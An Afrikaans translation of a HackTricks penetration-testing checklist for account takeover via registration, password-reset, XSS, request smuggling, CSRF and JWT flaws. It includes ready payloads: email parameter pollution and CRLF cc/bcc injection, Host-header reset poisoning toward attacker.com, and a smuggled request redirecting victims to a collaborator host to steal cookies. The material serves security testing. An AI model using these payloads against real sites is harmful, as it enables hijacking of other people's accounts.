Registration & Takeover Vulnerabilities

Leer AWS hak vanaf nul tot held met htARTE (HackTricks AWS Red Team Expert)!

Ander maniere om HackTricks te ondersteun:

WhiteIntel is 'n donker-web aangedrewe soekenjin wat gratis funksies bied om te kontroleer of 'n maatskappy of sy kliënte deur steel-malware is gekompromiteer.

Hul primêre doel van WhiteIntel is om rekeningoorname en losprysaanvalle te beveg wat voortspruit uit inligtingsteel-malware.

Jy kan hul webwerf besoek en hul enjin gratis probeer by:


Registrasie Oorname

Duplikaat Registrasie

  • Probeer om te genereer met 'n bestaande gebruikersnaam

  • Kontroleer variasie in die e-pos:

    • hoofletters

    • +1@

    • voeg 'n paar punte by in die e-pos

    • spesiale karakters in die e-posnaam (%00, %09, %20)

    • Plaas swart karakters na die e-pos: test@test.com a

    • victim@gmail.com@attacker.com

    • victim@attacker.com@gmail.com

Gebruikersnaam Enumerasie

Kyk of jy kan uitfigure wanneer 'n gebruikersnaam reeds geregistreer is binne die aansoek.

Wagwoordbeleid

Skep 'n gebruiker en kyk na die wagwoordbeleid (kyk of jy swak wagwoorde kan gebruik). In daardie geval kan jy probeer om geloofsbriewe te bruteforce.

SQL Injeksie

Kyk na hierdie bladsy om te leer hoe om rekeningoorname te probeer of inligting te onttrek via SQL Injeksies in registrasievorms.

Oauth Oorname

pageOAuth to Account takeover

SAML Kwesbaarhede

pageSAML Attacks

Verander E-pos

Wanneer geregistreer, probeer om die e-pos te verander en kyk of hierdie verandering korrek gevalideer word of dit na willekeurige e-posse kan verander.

Meer Kontroles

  • Kyk of jy weggooi-e-posse kan gebruik

  • Lang wagwoord (>200) lei tot DoS

  • Kyk na tempo-limiete op rekening-skepping

  • Gebruik username@burp_collab.net en analiseer die terugroep

Wagwoord Herstel Oorname

Wagwoord Herstel Token Lek via Verwysing

  1. Versoek wagwoordherstel na jou e-posadres

  2. Klik op die wagwoordherstel skakel

  3. Verander nie wagwoord nie

  4. Klik op enige 3de party webwerwe (bv: Facebook, twitter)

  5. Onderskep die versoek in Burp Suite proxy

  6. Kyk of die verwysingskop wagwoordherstel-token lek.

Wagwoord Herstel Vergiftiging

  1. Onderskep die wagwoordherstel versoek in Burp Suite

  2. Voeg of wysig die volgende koppe in Burp Suite by: Host: attacker.com, X-Forwarded-Host: attacker.com

  3. Stuur die versoek met die gewysigde kop http POST https://example.com/reset.php HTTP/1.1 Accept: */* Content-Type: application/json Host: attacker.com

  4. Soek na 'n wagwoordherstel-URL gebaseer op die host-kop soos: https://attacker.com/reset-password.php?token=TOKEN

Wagwoord Herstel Via E-pos Parameter

# parameter pollution
email=victim@mail.com&email=hacker@mail.com

# array of emails
{"email":["victim@mail.com","hacker@mail.com"]}

# carbon copy
email=victim@mail.com%0A%0Dcc:hacker@mail.com
email=victim@mail.com%0A%0Dbcc:hacker@mail.com

# separator
email=victim@mail.com,hacker@mail.com
email=victim@mail.com%20hacker@mail.com
email=victim@mail.com|hacker@mail.com

IDOR op API-parameters

  1. Aanvaller moet inlog met hul rekening en na die Wagwoord verander-funksie gaan.

  2. Begin die Burp Suite en onderskep die versoek.

  3. Stuur dit na die herhalingskategorie en wysig die parameters: Gebruiker-ID/e-pos powershell POST /api/changepass [...] ("vorm": {"e-pos":"slagoffer@e-pos.com","wagwoord":"veilige wagwoord"})

Swak Wagwoord-herstelteken

Die wagwoord-herstelteken moet ewekansig gegenereer en uniek wees elke keer. Probeer bepaal of die teken verval of altyd dieselfde is, in sommige gevalle is die genereringsalgoritme swak en kan geraden word. Die volgende veranderlikes kan deur die algoritme gebruik word.

  • Tydstempel

  • Gebruiker-ID

  • E-pos van Gebruiker

  • Voornaam en Van

  • Geboortedatum

  • Kriptografie

  • Slegs nommer

  • Klein tekenreeks (karakters tussen [A-Z,a-z,0-9])

  • Tekenhergebruik

  • Tekenvervaldatum

Uitlek van Wagwoord-herstelteken

  1. Trigger 'n wagwoord-herstelversoek deur die API/UI vir 'n spesifieke e-pos bv: toets@pos.com

  2. Inspekteer die bedienerreaksie en soek na resetToken

  3. Gebruik dan die teken in 'n URL soos https://voorbeeld.com/v3/gebruiker/wagwoord/herstel?resetToken=[DIE_RESET_TEKEN]&e-pos=[DIE_POS]

Wagwoord-herstel via Gebruikersnaam-botsing

  1. Registreer op die stelsel met 'n gebruikersnaam identies aan die slagoffer se gebruikersnaam, maar met spasies ingevoeg voor en/of na die gebruikersnaam. bv: "admin "

  2. Vra 'n wagwoordherstel met jou skadelike gebruikersnaam aan.

  3. Gebruik die teken wat na jou e-pos gestuur is en herstel die slagoffer se wagwoord.

  4. Koppel aan die slagoffer se rekening met die nuwe wagwoord.

Die platform CTFd was vatbaar vir hierdie aanval. Sien: CVE-2020-7245

Rekening-oorneem via Kruissite-skripsing

  1. Vind 'n Kruissite-skripsing binne die aansoek of 'n subdomein as die koekies toegespits is op die ouer domein: *.domein.com

  2. Laat die huidige sessiekoekie uitlek.

  3. Verifieer as die gebruiker deur die koekie.

Rekening-oorneem via HTTP-versoeksmokkel

1. Gebruik smuggler om die tipe HTTP-versoeksmokkeling (CL, TE, CL.TE) op te spoor powershell git clone https://github.com/defparam/smuggler.git cd smuggler python3 smuggler.py -h 2. Stel 'n versoek op wat die POST / HTTP/1.1 sal oorskryf met die volgende data: GET http://iets.burpcollaborator.net HTTP/1.1 X: met die doel om die slagoffers na burpcollab te oopverwys en hul koekies te steel 3. Die finale versoek kan so lyk:

GET / HTTP/1.1
Transfer-Encoding: chunked
Host: something.com
User-Agent: Smuggler/v1.0
Content-Length: 83
0

GET http://something.burpcollaborator.net  HTTP/1.1
X: X

Hackerone-rapporteerders wat hierdie fout uitgebuit het * https://hackerone.com/reports/737140 * https://hackerone.com/reports/771666

Rekening-oorneem deur CSRF

  1. Skep 'n lading vir die CSRF, bv: "HTML-vorm met outomatiese indiening vir 'n wagwoordverandering"

  2. Stuur die lading

Rekening-oorneem deur JWT

JSON Web Token kan gebruik word om 'n gebruiker te verifieer.

  • Wysig die JWT met 'n ander Gebruiker-ID / E-pos

  • Kontroleer vir swak JWT-handtekening

pageJWT Vulnerabilities (Json Web Tokens)

Verwysings

WhiteIntel is 'n donkerweb-aangedrewe soekenjin wat gratis funksies bied om te kontroleer of 'n maatskappy of sy kliënte deur diewe-malware gekompromitteer is.

Die primêre doel van WhiteIntel is om rekening-oorneem en lospryse-aanvalle te bekamp wat voortspruit uit inligtingsteel-malware.

Jy kan hul webwerf besoek en hul enjin gratis probeer by:

Leer AWS-hacking van niks tot held met htARTE (HackTricks AWS Red Team Expert)!

Ander maniere om HackTricks te ondersteun:

Last updated